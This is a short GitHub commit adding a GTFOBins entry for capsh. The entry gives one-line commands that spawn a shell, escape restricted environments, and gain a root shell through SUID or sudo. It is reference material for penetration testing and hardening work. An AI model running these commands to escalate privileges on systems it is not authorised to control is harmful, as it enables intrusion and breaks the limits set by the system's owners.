Add capsh

This commit is contained in:
Yash Saxena
2020-11-27 18:52:31 +05:30
committed by GitHub
parent 22899a5159
commit a38ccf2621

9
_gtfobins/capsh.md Normal file
View File

@@ -0,0 +1,9 @@
---
functions:
shell:
- code: capsh --
suid:
- code: ./capsh --gid=0 --uid=0 --
sudo:
- code: sudo capsh --
---